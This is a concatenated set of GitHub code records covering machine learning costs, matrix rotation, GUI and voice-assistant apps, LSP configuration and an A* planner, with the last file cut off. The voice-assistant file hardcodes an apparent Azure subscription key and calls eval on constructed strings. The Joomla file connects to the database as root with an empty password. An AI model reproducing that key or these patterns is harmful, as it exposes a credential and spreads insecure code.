_, coeff, _ in self.costs)\n\n # normalize for coefficients on each cost\n return total / coeff_sum\n\n @wraps(Cost.get_monitoring_channels)\n def get_monitoring_channels(self, model, data, **kwargs):\n self.get_data_specs(model)[0].validate(data)\n\n rval = OrderedDict()\n\n # if there's only 1 cost, then no need to split up the costs\n if len(self.costs) > 1:\n output = self._get_samples_from_model(model, data)\n\n rval['reconstruction_cost'] =\\\n self._get_total_for_cost(0, self.costs[0][2], data, output)\n\n rval['classification_cost'] =\\\n self._get_total_for_cost(1, self.costs[1][2], data, output)\n\n return rval\n\n @wraps(Cost.get_data_specs)\n def get_data_specs(self, model):\n # get space for layer i of model\n get_space = lambda i: (model.aes[i].get_input_space() if i == 0\n else model.aes[i - 1].get_output_space())\n\n # get the spaces for layers that we have costs at\n spaces = map(lambda c: get_space(c[0]), self.costs)\n\n sources = [model.get_input_source()]\n if len(self.costs) == 2:\n sources.append(model.get_target_source())\n\n return (CompositeSpace(spaces), tuple(sources))\n","repo_name":"lisa-lab/pylearn2","sub_path":"pylearn2/costs/gsn.py","file_name":"gsn.py","file_ext":"py","file_size_in_byte":8000,"program_lang":"python","lang":"en","doc_type":"code","stars":2743,"dataset":"github-code","pt":"53"} +{"seq_id":"12913965022","text":"# Given an image represented by an N x N matrix, where each pixel in the image is represented by an integer, write a method to rotate thise image by 90 degrees.\n# Can you do this in place?\n# I: N x N matrix\n# 0: N x N matrix - 90 deg, clockwise\n# C: rotate matrix in place\n# E: empty matrix, non square matrix, m.length != m[i].length\n# eg [\n# [1,2],\n# [3,4]\n# ] \n# => \n# [\n# [3,1],\n# [4,2]\n# ]\n# First row becomes last column\n# Second row becomes second from last column and so on.\n\nmatrix = [\n [1,2,3,4,],\n [5,6,7,8],\n [9,10,11,12],\n [13,14,15,16],\n]\n\nm_by_n_matrix = [\n [1,2,3,4],\n [5,6,7,8],\n [9,10,11,12],\n [13,14,15,16],\n [17,18,19,20]\n]\n\ndef rotate_m_by_n_matrix(matrix):\n col_length = len(matrix)\n row_length = len(matrix[0])\n rotated_matrix = [[0] * col_length for row in matrix[0]]\n for row_index in range(col_length):\n for column_index in range(row_length):\n destination_row_index = col_length - 1 - row_index\n rotated_matrix[column_index][destination_row_index] = matrix[row_index][column_index]\n return rotated_matrix\n\nassert rotate_m_by_n_matrix(m_by_n_matrix) == [\n [17,13,9,5,1],\n [18,14,10,6,2],\n [19,15,11,7,3],\n [20,16,12,8,4]\n]\n\nassert rotate_m_by_n_matrix(matrix) == [\n [13,9,5,1],\n [14,10,6,2],\n [15,11,7,3],\n [16,12,8,4]\n]\n\n\n\n\n","repo_name":"bibbycodes/data_structures","sub_path":"lib/rotate_matrix.py","file_name":"rotate_matrix.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69997092008","text":"import requests\n\n\nurl_ddg = \"https://api.duckduckgo.com/?q=presidents of the united states&format=json&pretty=1\"\nresp = requests.get(url_ddg)\nrsp_data = resp.json()\n\nfor item in rsp_data:\n print(\"item: \", item)\n print(\"value:\", rsp_data[item])\n pres_list = rsp_data[item]\nprint(\"\\n*********************************************************************************\\n\")\nfor x in rsp_data['RelatedTopics']:\n print(\"entries: \", x)\n","repo_name":"imercadovazquez/PresidentsLab","sub_path":"gitremote/lab_duckduckgo.py","file_name":"lab_duckduckgo.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527320607","text":"import traceback\n\nimport requests\nimport ujson as json\n\nHTTP_GET = \"get\"\nHTTP_POST = \"post\"\n\n\ndef post(url, params, logger, headers=None):\n return http_do(\"post\", url, params, logger, headers)\n\n\ndef get(url, params, logger, headers=None):\n return http_do(\"get\", url, params, logger, headers)\n\n\ndef http_do(method, url, params, logger, headers=None):\n session_request = requests.Session()\n if headers:\n headers.update({\"Content-Type\": \"application/json\"})\n session_request.headers = headers\n else:\n session_request.headers = {\"Content-Type\": \"application/json\"}\n try:\n if method == \"get\":\n resp = getattr(session_request, \"get\")(url, params=params)\n else:\n resp = getattr(session_request, \"post\")(url, data=json.dumps(params))\n except Exception as e:\n logger.error(traceback.format_exc())\n return False, {\"result\": False, \"message\": str(e)}\n\n if not resp.ok:\n return False, {\"result\": False, \"message\": \"request error, status code: {}\".format(resp.status_code)}\n\n try:\n json_data = resp.json()\n except Exception as e:\n logger.error(traceback.format_exc())\n return False, {\"result\": False, \"message\": str(e)}\n\n return True, json_data\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"1242501561","text":"import PySimpleGUI as sg\nfrom Notebook import Notebook, delete, inserch, update, save, get_all, print_all, get_by_id, filter, title_str\nimport one_note\nimport note_gui\nimport serch\nimport threading\n\ndef Main_Window():\n layout = [\n [sg.Text(\"NOTEBOOK\", font=\"Roboto 25\", justification=\"center\", size=(35, 1))],\n [sg.Push()],\n [sg.Input(justification=\"center\", border_width=\"5\", font=\"Roboto 15\", key=\"input_text\"), sg.Image(\"search.png\", enable_events=True, key=\"search\")],\n [sg.Push()],\n [sg.InputCombo(values=[\"за алфавітом\",\"за датой оновлення\"], key=\"filter\", default_value=\"за датой оновлення\", enable_events=True)],\n ]\n notes = []\n notebooks = get_all()\n for note in notebooks:\n temp = [sg.Push(), sg.Text(title_str(note.title), font=\"Arial\", background_color=\"#0f0f00\", enable_events=True, key=f'note{note.id}', justification=\"center\"), sg.VerticalSeparator(), sg.Text(title_str(note.text), font=\"Arial\", enable_events=True, key=f'notes{note.id}'), sg.Push(), sg.Image(\"delete.png\", size=(25,25), enable_events=True, key=f'del{note.id}'), sg.Push()]\n notes.append(temp)\n notes.append([sg.Text('-'*60, size=(60,1), justification='center')])\n\n\n layout.extend(notes)\n layout.append([sg.Push(), sg.Push(), sg.Push(),sg.Image(\"add-svg.png\", enable_events=True, key=\"add_new\"), sg.Push()])\n window = sg.Window('NoteBook',finalize=True, icon=\"C:\\\\Users\\\\Admin\\\\Desktop\\\\ІТ Харьков\\\\питон\\\\Notebook\\\\notebbok.png\").Layout([[sg.Column(layout,size=(630,400), scrollable=True, element_justification=\"center\", vertical_scroll_only=True,sbar_trough_color='black')]])\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED or event == 'Cancel':\n break\n if event == \"search\":\n if len(values['input_text']) > 0:\n notes = inserch(values[\"input_text\"], values[\"filter\"])\n if len(notes)>0:\n window.close()\n serch.serch(notes)\n print(\"Click\")\n\n\n if event == \"filter\":\n print(\"filter\")\n print(values['filter'])\n notes = filter(order=values['filter'])\n print_all(notes)\n\n\n\n\n if event.startswith(\"note\") or event.startswith(\"notes\"):\n if event.startswith('notes'):\n id = int(event[5:len(event)])\n window.close()\n note_gui.Note(id)\n\n\n\n elif event.startswith('note'):\n id = int(event[4:len(event)])\n window.close()\n note_gui.Note(id)\n\n if event.startswith(\"del\"):\n id = int(event[3:len(event)])\n\n delete(get_by_id(id))\n window.close()\n Main_Window()\n print(\"Delete ok\")\n\n\n if event == \"add_new\":\n print(\"ADD\")\n window.close()\n one_note.Add_Note()\n\n\n window.close()\n\n '''\n \n import PySimpleGUI as sg\n from Notebook import Notebook, delete, inserch, update, save, get_all\n \n title = [sg.Text(\"Notebook\", size=(100, 1), text_color=\"#f0f0ff\", font=\"Roboto 25\")]\n \n search = [sg.InputText(key=\"input_search\", size=(50, 5), justification=\"center\"), sg.Image(\"Notebook/search.png\", size=(25,25), enable_events=True, key=\"Image\")]\n \n filter = [sg.InputCombo(values=[\"за алфавітом\",\"за датой оновлення\"], key=\"filter\", default_value=\"за датой оновлення\")]\n \n notes = []\n notebooks = get_all()\n for note in notebooks:\n temp = [sg.Text(note.title, font=\"Arial\", background_color=\"#0f0f00\", enable_events=True, key=f'note{note.id}', justification=\"center\"), sg.VerticalSeparator(), sg.Text(note.text[0:5]+\"...\", font=\"Arial\")]\n notes.append(temp)\n notes.append([sg.Text('-'*60, size=(60,1), justification='center')])\n \n layout = [\n title,\n [sg.HorizontalSeparator()],\n search,\n [sg.HorizontalSeparator()],\n filter,\n ]\n layout.extend(notes)\n layout.append([sg.Image(\"Notebook/add-svg.png\", enable_events=True, key=\"add_new\"), sg.Push(), sg.Push()])\n \n window = sg.Window(\"Notebook\" ).Layout([[sg.Column(layout, scrollable=True, size=(450, 450), vertical_scroll_only=True)]])\n event, values = window.read()\n while event not in (None, \"Cancel\"):\n event, value = window.read()\n if event == \"Image\":\n print(\"Click\")\n if event.startswith(\"note\"):\n print(event)\n if event == \"add_new\":\n print(\"ADD\")\n '''\nif __name__ == \"__main__\":\n Main_Window()\n","repo_name":"ElisWhite/notebook","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34859315890","text":"import pymysql\n\n\nclass ComponentRetriever:\n def get_database_connection(self):\n host = \"localhost\"\n user = \"root\"\n password = \"\"\n database = \"JoomlaResearchTestSitedb\"\n try:\n db = pymysql.connect(host, user, password, database)\n return db\n except pymysql.err.DatabaseError as error:\n print(\"Error occurred while connecting to the database. \" + str(error.args[0]) + \" , \" + error.args[1])\n\n def get_article_id(self, article_name):\n try:\n connection = self.get_database_connection()\n article_name = article_name.lower().replace(\" \", \"-\")\n with connection.cursor() as cursor:\n get_article_id_sql = \"SELECT `id` FROM `fa64n_content` WHERE `alias` = %s;\"\n cursor.execute(get_article_id_sql, article_name)\n for id_cursor in cursor:\n return id_cursor[0]\n connection.commit()\n except pymysql.err.DatabaseError as err:\n print(\"Error occurred while the module registration. \" + str(err.args[0]) + \",\" + str(err.args[1]))\n connection.rollback()\n\n def get_last_inserted_menu_item(self):\n try:\n connection = self.get_database_connection()\n with connection.cursor() as cursor:\n get_last_menu_item_sql = \"SELECT `id`, `lft`, `rgt` FROM `fa64n_menu` WHERE `menutype` = %s ORDER BY \" \\\n \"`id` DESC LIMIT 1;\"\n cursor.execute(get_last_menu_item_sql, \"mainmenu\")\n menu_item_details = []\n for cursor_details in cursor:\n menu_item_details.append(cursor_details)\n connection.commit()\n return menu_item_details\n except pymysql.err.DatabaseError as err:\n print(\"Error occurred while the module registration. \" + str(err.args[0]) + \",\" + str(err.args[1]))\n connection.rollback()\n\n\n\ncomp_trt = ComponentRetriever()\n# comp_trt.get_article_id(\"Article Test article 004\")\n# details = comp_trt.get_last_inserted_menu_item()\n# for det in details:\n# print(det[1])\n","repo_name":"ShanChathusanda93/python-devs","sub_path":"dbaccess/component_retriever.py","file_name":"component_retriever.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43213775385","text":"from azure.cognitiveservices.speech.audio import AudioOutputConfig\nimport azure.cognitiveservices.speech as speechsdk\nimport speech_recognition as sr\n\nimport importlib\nimport unidecode\n\nfrom minerva import rotinas\nimport comandos\n\nlista_comandos = comandos.lista_comandos\n\ndef receber_lista_comandos_atualizada():\n importlib.reload(comandos)\n importlib.reload(rotinas)\n global lista_comandos\n lista_comandos = comandos.lista_comandos\n return comandos.lista_comandos.keys()\n\ndef executar_rotina(nome_rotina):\n print(\"inicio rotina\")\n comandos = eval(f\"rotinas.{nome_rotina}()\")\n print(comandos)\n for i in comandos:\n run_minerva(input_microfone = False, input_texto = f\"{i}\")\n return \"rotina finalizada\"\n\n\ndef fale(text):\n print(text)\n speech_config = speechsdk.SpeechConfig(subscription=\"9bc9a7005e8f4ab9b42c4ecc13d5680a\",\n region=\"brazilsouth\")\n\n # In this sample we are using the default speaker\n # Learn how to customize your speaker using SSML in Azure Cognitive Services Speech documentation\n\n speech_config.speech_synthesis_language = 'pt-br'\n audio_config = AudioOutputConfig(use_default_speaker=True)\n synthesizer = speechsdk.SpeechSynthesizer(speech_config=speech_config,\n audio_config=audio_config)\n\n synthesizer.speak_text_async(text)\n\n # synthesize_to_speaker()\n\n\ndef receber_variaveis(text):\n fale(text)\n valor = input(text)\n return valor\n\n\ndef receber_audio():\n # print(sr.Microphone.list_microphone_names())\n rec = sr.Recognizer()\n with sr.Microphone() as mic:\n rec.adjust_for_ambient_noise(mic)\n print(\"Estou te ouvindo...\")\n audio = rec.listen(mic)\n\n try:\n print(\"Trancrevendo...\")\n frase = rec.recognize_google(audio, language=\"pt-BR\")\n frase = unidecode.unidecode(frase)\n print(frase)\n return frase.lower()\n except:\n print(\"Erro no recebimento de áudio\")\n return \"erro no recebimento de áudio\"\n\n\ndef run_minerva(input_microfone=False, input_texto=\"\"):\n if input_microfone == True:\n comando = receber_audio()\n else:\n comando = input_texto\n\n#IMPORTANTE LEMBRAR DE COMANDOS COM MAIS ARGUMENTOS [*] MAIS EM CIMA\n print(lista_comandos.keys())\n for chave in lista_comandos.keys():\n if \"*\" in chave: #verifico se o comando precisa de argumentos\n \n argumentos_chave = chave.split() \n #Separo as palavras da chave da lista de comandos\n \n argumentos_comando = comando.split() #Separo as palavras do comando\n try:\n if argumentos_comando[0] == \"minerva\":\n argumentos_comando = argumentos_comando.pop(0) #Retiro a palavra Minerva\n except:\n break\n contem_palavras_necessarias = 0\n palavras_necessarias = len(argumentos_chave) - argumentos_chave.count(\"*\")\n\n for palavra in range(len(argumentos_chave)): #pra cada palavra na chave\n if argumentos_chave[palavra] != \"*\": #se for diferente de *\n if argumentos_chave[palavra] in comando: #vejo se a palavra esta no comando inicial\n contem_palavras_necessarias += 1 #se sim ela tem +1 palavra necessaria pra rodar esse comandos\n try:\n argumentos_comando.remove(argumentos_chave[palavra]) #Retiro essa palavra do comando, para sobrar so oque não tem a ver com chamar a função\n except:\n break\n if palavras_necessarias == contem_palavras_necessarias: #se ela atingir o total de palavras necessarias\n resposta = lista_comandos[chave](' '.join(argumentos_comando))\n try:\n fale(resposta)\n return resposta\n except:\n pass\n break\n\n elif \"@\" in chave:\n if chave.replace(\"@ \", \"\") in comando:\n return executar_rotina(lista_comandos[chave])\n break\n\n else:\n\n if chave in comando:\n resposta = lista_comandos[chave]()\n fale(resposta)\n return resposta\n break\n\n else:\n if comando != \"erro no recebimento de áudio\":\n lista_comandos[\"pesquise *\"](comando)\n fale(f'Desculpe, comando não encontrado, mas pesquisei {comando} no google')\n return f'Desculpe, comando não encontrado, mas pesquisei {comando} no google'\n else:\n fale(\"erro no recebimento de áudio\")\n return \"erro no recebimento de áudio\"\n\ndef teste_microfone():\n while True:\n a = receber_audio()\n print(a)\n\ndef tela():\n tipo_input = input(\"[1]Microfone [2]Comando: \")\n if tipo_input == \"1\":\n run_minerva(input_microfone=True)\n elif tipo_input == \"2\":\n run_minerva(input_texto=input(\"Digite seu comando:\"))\n else:\n fale(\"opção invalida\")\n\n\n\nif __name__ == \"__main__\":\n while True:\n # teste_microfone()\n importlib.reload(rotinas)\n importlib.reload(comandos)\n lista_comandos = comandos.lista_comandos\n tela()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"FariasMarina/Minerva","sub_path":"minerva/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"26393893914","text":"from unittest import TestCase\n\nfrom tic_tac_toe_python_playground.apps.core.dealer import make_move\n\n\nclass Test(TestCase):\n def test_should_make_move_in_position_4(self):\n fake_actual_board_to_be_tested = [\n [0, 1, 2],\n [3, 4, 5],\n [5, 7, 8],\n ]\n expected_board_result = [\n [0, 1, 2],\n [3, \"X\", 5],\n [5, 7, 8],\n ]\n result_board = make_move(fake_actual_board_to_be_tested, 4, \"X\")\n self.assertEquals(expected_board_result, result_board)\n","repo_name":"wpgalmeida/tic-tac-toe-python-playground","sub_path":"tests/apps/test_dealer.py","file_name":"test_dealer.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17372669573","text":"# Chapter: 3 \r\n## Converintg into grayscale\r\n\r\n# Library Import\r\n\r\nimport cv2 as cv\r\nfrom cv2 import cvtColor #color conversion\r\n\r\nimg = cv.imread(\"FILE PATH\")\r\n\r\n## Conversion\r\ngray_img = cvtColor(img, cv.COLOR_BGR2GRAY)\r\n\r\n#Displays an image in a window.\r\ncv.imshow(\"WINDOWS TEXT\", img)\r\ncv.imshow(\"GrayScale Image\", gray_img)\r\n\r\n\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()","repo_name":"Saadat-Khalid/Learn_OpenCV_by_Saadat-Khalid","sub_path":"03-Chapter_3_Converting_GrayScale.py","file_name":"03-Chapter_3_Converting_GrayScale.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32002148489","text":"filename = \"input.txt\"\n\n# filename = input()\nt = open(filename, 'rt')\n\nlines = t.readlines()\n\ncount = 0\nans = 0\n\nfor line in lines:\n\twords = line.split(' ')\n\tprint(words[-1])\n\t# if curr > 5000:\n\t# \tcount += 1\n\t# \tans += curr\n\t\n\nmyfile = open( \"bytes_\"+filename, 'w+')\n\nmyfile.write(\"%d\\n\" %count)\nmyfile.write(\"%d\" %ans)","repo_name":"shivamgohri/ds_codes","sub_path":"Temporary/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73147624487","text":"from .editor import View\nfrom copy import deepcopy\nfrom .logging import debug\nfrom .types import ClientConfig, WindowLike\nfrom .types import config_supports_syntax\nfrom .typing import List, Tuple, Optional, Iterator\nfrom .workspace import get_project_config\n\n\ndef get_scope_client_config(view: View, configs: List[ClientConfig],\n point: Optional[int] = None) -> Optional[ClientConfig]:\n return next(get_scope_client_configs(view, configs, point), None)\n\n\ndef get_scope_client_configs(view: View, configs: List[ClientConfig],\n point: Optional[int] = None) -> Iterator[ClientConfig]:\n # When there are multiple server configurations, all of which are for\n # similar scopes (e.g. 'source.json', 'source.json.settings') the\n # configuration with the most specific scope (highest ranked selector)\n # in the current position is preferred.\n if point is None:\n sel = view.sel()\n if len(sel) > 0:\n point = sel[0].begin()\n\n languages = view.settings().get('lsp_language', None)\n scope_configs = [] # type: List[Tuple[ClientConfig, Optional[int]]]\n\n for config in configs:\n if config.enabled:\n if languages is None or config.name in languages:\n for language in config.languages:\n for scope in language.scopes:\n score = 0\n if point is not None:\n score = view.score_selector(point, scope)\n if score > 0:\n scope_configs.append((config, score))\n # debug('scope {} score {}'.format(scope, score))\n\n return (config_score[0] for config_score in sorted(\n scope_configs, key=lambda config_score: config_score[1], reverse=True))\n\n\ndef get_global_client_config(view: View, global_configs: List[ClientConfig]) -> Optional[ClientConfig]:\n return get_scope_client_config(view, global_configs)\n\n\ndef create_window_configs(window: WindowLike, global_configs: List[ClientConfig]) -> List[ClientConfig]:\n window_config = get_project_config(window)\n return list(map(lambda c: apply_project_overrides(c, window_config), global_configs))\n\n\ndef apply_project_overrides(client_config: ClientConfig, lsp_project_settings: dict) -> ClientConfig:\n if client_config.name in lsp_project_settings:\n overrides = lsp_project_settings[client_config.name]\n debug('window has override for {}'.format(client_config.name), overrides)\n client_settings = _merge_dicts(client_config.settings, overrides.get(\"settings\", {}))\n client_env = _merge_dicts(client_config.env, overrides.get(\"env\", {}))\n return ClientConfig(\n client_config.name,\n overrides.get(\"command\", client_config.binary_args),\n overrides.get(\"tcp_port\", client_config.tcp_port),\n [],\n [],\n \"\",\n client_config.languages,\n overrides.get(\"enabled\", client_config.enabled),\n overrides.get(\"initializationOptions\", client_config.init_options),\n client_settings,\n client_env,\n overrides.get(\"tcp_host\", client_config.tcp_host),\n overrides.get(\"experimental_capabilities\", client_config.experimental_capabilities),\n )\n\n return client_config\n\n\ndef is_supported_syntax(syntax: str, configs: List[ClientConfig]) -> bool:\n for config in configs:\n if config_supports_syntax(config, syntax):\n return True\n return False\n\n\ndef _merge_dicts(dict_a: dict, dict_b: dict) -> dict:\n \"\"\"Merge dict_b into dict_a with one level of recurse\"\"\"\n result_dict = deepcopy(dict_a)\n for key, value in dict_b.items():\n if isinstance(result_dict.get(key), dict) and isinstance(value, dict):\n result_dict.setdefault(key, {}).update(value)\n else:\n result_dict[key] = value\n return result_dict\n","repo_name":"dcampos/nvim-lfx","sub_path":"rplugin/python3/lfx/core/configurations.py","file_name":"configurations.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37049984643","text":"import pygame\nimport math\nimport heapq\nimport time\n\n\nh = 500\nw = 500\nwhite = (255, 255, 255)\nblue = (0,0, 255)\nyellow = (255, 255, 0)\nred = (255, 0, 0)\nblack = (0, 0, 0)\n\n\nclass Node:\n\n def __init__(self, x, y, endX, endY, theta):\n self.i = x\n self.j = y\n self.theta = theta\n self.costToCome = 0.0\n self.costToGo = 2.5*(math.sqrt((x - endX) ** 2 + (y - endY) ** 2))\n self.cost = None\n self.neighbours = {}\n self.valid_actions = {}\n self.parent = None\n\n def __lt__(self, other):\n return self.cost < other.cost\n\n\nclass Graph:\n\n def __init__(self, start, end, RPM1, RPM2, radius, cl):\n self.visited = {}\n self.endX = end.i\n self.endY = end.j\n self.RPM1 = RPM1\n self.RPM2 = RPM2\n self.radius = radius\n self.cl = cl + self.radius\n\n def new_coords(self, i, j, theta, UL, UR):\n t = 0\n r = 0.22\n L = 0.287\n dt = 0.1\n\n UL = 3.14*UL/30\n UR = 3.14*UR/30\n\n newX = i\n newY = j\n newTheta = 3.14 * theta/180\n D = 0\n\n while t < 1:\n t = t + dt\n Delta_Xn = 0.5 * r * (UL + UR) * math.cos(newTheta) * dt\n Delta_Yn = 0.5 * r * (UL + UR) * math.sin(newTheta) * dt\n newX += Delta_Xn\n newY += Delta_Yn\n newTheta += (r / L) * (UR - UL) * dt\n D = D + math.sqrt(math.pow(Delta_Xn, 2) + math.pow(Delta_Yn, 2))\n newTheta = 180*newTheta/3.14\n\n if newTheta > 0:\n newTheta = newTheta % 360\n elif newTheta < 0:\n newTheta = (newTheta + 360) % 360\n\n newX = self.round_num(newX)\n newY = self.round_num(newY)\n\n return newX, newY, newTheta, D\n def neighbours(self, currentNode):\n i, j, theta = currentNode.i, currentNode.j, currentNode.theta\n neighbours = {}\n valid_actions = {}\n actions = [[0, self.RPM1], [self.RPM1, 0], [self.RPM1, self.RPM1], [0, self.RPM2], [self.RPM2, 0], [self.RPM2, self.RPM2], [self.RPM1, self.RPM2], [self.RPM2, self.RPM1]]\n for UL, UR in actions:\n x, y, newTheta, distance = self.new_coords(i, j, theta, UL, UR)\n if (not self.isOutsideArena(x, y)) and (not self.isAnObstacle(x, y)):\n newNode = Node(x, y, self.endX, self.endY, newTheta)\n neighbours[newNode] = distance\n valid_actions[newNode] = [UL, UR]\n return neighbours, valid_actions\n\n \n\n def drawActionSet(self, x, y, theta, UL, UR, color):\n t = 0\n r = 0.22\n L = 0.287\n dt = 0.1\n\n newX = x\n newY = y\n newTheta = 3.14*theta/180\n UL = 3.14*UL/30\n UR = 3.14*UR/30\n\n while t < 1:\n t = t + dt\n oldX = newX\n oldY = newY\n newX += 0.5 * r * (UL + UR) * math.cos(newTheta) * dt\n newY += 0.5 * r * (UL + UR) * math.sin(newTheta) * dt\n pygame.draw.line(gridDisplay, color, [int(50*oldX), int(h - 50*oldY)], [int(50*newX), int(h - 50*newY)], 2)\n newTheta += (r / L) * (UR - UL) * dt\n pygame.display.update()\n time.sleep(0.1)\n\n return\n\n\n def round_num(self, i):\n\n i = 50*i\n i = int(i)\n i = i/50\n return i\n\n def generateGraph(self):\n gridDisplay.fill(white)\n pygame.draw.circle(gridDisplay, black, [100, int(h - 100)], 50)\n pygame.draw.circle(gridDisplay, black, [100, int(h - 400)], 50)\n pygame.draw.polygon(gridDisplay, black, [(int(50*0.25), int(h - 50*5.75)), (int(50*1.75), int(h - 50*5.75)), (int(50*1.75), int(h - 50*4.25)), (50*0.25, h - 50*4.25)])\n pygame.draw.polygon(gridDisplay, black, [(int(50*3.75), int(h - 50*5.75)), (int(50*6.25), int(h - 50*5.75)), (int(50*6.25), int(h) - int(50*4.25)), (int(50*3.75), int(h - 50*4.25))])\n pygame.draw.polygon(gridDisplay, black, [(int(50*7.25), int(h - 50*4)), (int(50*8.75), int(h - 50*4)), (int(50*8.75), int(h - 50*2)), (int(50*7.25), int(h - 50*2))])\n\n def performAStar(self, start, end):\n if self.isAnObstacle(start.i, start.j) and self.isAnObstacle(end.i, end.j):\n print(\"Starting and endXng point are inside the obstacle!\")\n return\n\n if self.isAnObstacle(start.i, start.j):\n print(\"Starting point is inside the obstacle!\")\n return\n if self.isAnObstacle(end.i, end.j):\n print(\"EndXng point is inside the obstacle!\")\n return\n\n if self.isOutsideArena(start.i, start.j):\n print(\"Starting point is outside the arena!\")\n return\n\n if self.isOutsideArena(end.i, end.j):\n print(\"EndXng point is outside the arena!\")\n return\n\n print(\"Started A-star algorithm\")\n priorityQueue = []\n visited_list = {}\n heapq.heappush(priorityQueue, (start.cost, start))\n while len(priorityQueue):\n currentNode = heapq.heappop(priorityQueue)\n currentNode = currentNode[1]\n if self.isInTargetArea(currentNode.i, currentNode.j):\n print(\"Found a path!\")\n return True\n\n if tuple([currentNode.i, currentNode.j]) in visited_list:\n continue\n visited_list[tuple([currentNode.i, currentNode.j])] = True\n\n currentDistance = currentNode.costToCome\n neighbours, valid_actions = self.neighbours(currentNode)\n currentNode.neighbours = neighbours\n currentNode.valid_actions = valid_actions\n for neighbourNode, newDistance in neighbours.items():\n neighbourNode.costToCome = currentDistance + newDistance\n neighbourNode.cost = neighbourNode.costToCome + neighbourNode.costToGo\n neighbourNode.parent = currentNode\n heapq.heappush(priorityQueue, (neighbourNode.cost, neighbourNode))\n print((neighbourNode.i, neighbourNode.j))\n print(\"No path found\")\n return False\n\n def visualize(self, start, end):\n\n visited_list = {}\n priorityQueue = []\n heapq.heappush(priorityQueue, (start.cost, start))\n pygame.draw.circle(gridDisplay, black, [int(50*start.i), int(h - 50*start.j)], 5)\n pygame.draw.circle(gridDisplay, black, [int(50*end.i), int(h - 50*end.j)], 5)\n pygame.display.update()\n while len(priorityQueue):\n\n currentNode = heapq.heappop(priorityQueue)\n currentNode = currentNode[1]\n\n if self.isInTargetArea(currentNode.i, currentNode.j):\n self.backTrack(currentNode)\n print(\"Total distance from start to goal is:\", currentNode.costToCome)\n return\n\n if tuple([currentNode.i, currentNode.j]) in visited_list:\n continue\n visited_list[tuple([currentNode.i, currentNode.j])] = True\n\n for neighbourNode, action in currentNode.valid_actions.items():\n self.drawActionSet(currentNode.i,currentNode.j,currentNode.theta,action[0],action[1],red)\n\n for neighbourNode, newDistance in currentNode.neighbours.items():\n heapq.heappush(priorityQueue, (neighbourNode.cost, neighbourNode))\n\n return\n\n def isInTargetArea(self, i, j):\n \n if (i - self.endX) ** 2 + (j - self.endY) ** 2 - 0.01 <= 0:\n return True\n else:\n return False\n\n def backTrack(self, child):\n while child != None:\n path.append(child)\n print(child.i, child.j, \"Path\")\n child = child.parent\n return True\n\n \n def isAnObstacle(self, x, y):\n\n # Boundary condition\n if (x < 0) or (x > 10) or (y < 0) or (y > 10): \n return True\n \n # Obstacle 1 (Circle Up)\n elif (x-2)**2 + (y-8)**2 - (1+self.cl)**2 <= 0: \n return True\n \n # Obstacle 2 (Square) \n elif x >= 0.25-self.cl and x <= 1.75+self.cl and y >= 4.25-self.cl and y <= 5.75+self.cl: \n return True\n \n # Obstacle 3 (Rectangle Up)\n elif x >= 3.75-self.cl and x <= 6.25+self.cl and y >= 4.25-self.cl and y <= 5.75+self.cl: \n return True\n \n # Obstacle 4 (Circle Down)\n elif (x-2)**2 + (y-2)**2 - (1+self.cl)**2 <= 0: \n return True\n \n # Obstacle 3 (Rectangle Down)\n elif x >= 7.25-self.cl and x <= 8.75+self.cl and y >= 2-self.cl and y <= 4+self.cl: \n return True\n \n # Node in Freespace\n else:\n return False \n \n\n\n def isOutsideArena(self, x, y):\n\n return True if x < self.cl or y < self.cl or x > 10 - self.cl or y > 10 - self.cl else False\n\n\nx1 = float(input(\"Enter the x coordinate of the starting point: \"))\ny1 = float(input(\"Enter the y coordinate of the starting point: \"))\nthetaStart = int(input(\"Enter the start theta: \"))\nprint(\"#############################################\")\n\nx2 = float(input(\"Enter the x coordinate of the ending point: \"))\ny2 = float(input(\"Enter the y coordinate of the ending point: \"))\nprint(\"#############################################\")\n\nRPM1 = float(input(\"Enter RPM1: \"))\nRPM2 = float(input(\"Enter RPM2 \"))\nradius = float(input(\"Enter the radius of the robot: \"))\ncl = float(input(\"Enter the cl: \"))\n\n#############################################\n# Algorithm Driver\nend = Node(x2, y2, x2, y2, 0)\nstart = Node(x1, y1, x2, y2, thetaStart)\nstart.costToCome = 0\nrobot = Graph(start, end, RPM1, RPM2, radius, cl)\npath = []\n\n# Check if path can be found\nif robot.performAStar(start, end):\n pass\n pygame.init() # Setup Pygame \n gridDisplay = pygame.display.set_mode((w, h))\n pygame.display.set_caption(\"A* Algorithm\")\n exiting = False\n clock = pygame.time.Clock()\n grid = [[0 for j in range(h)] for i in range(w)]\n canvas = Graph(start, end, RPM1, RPM2, radius, cl)\n canvas.generateGraph()\n robot.visualize(start, end)\n path.reverse()\nelse:\n # No Path Found\n exiting = True\n\nwhile not exiting:\n for event in pygame.event.get():\n if event.type 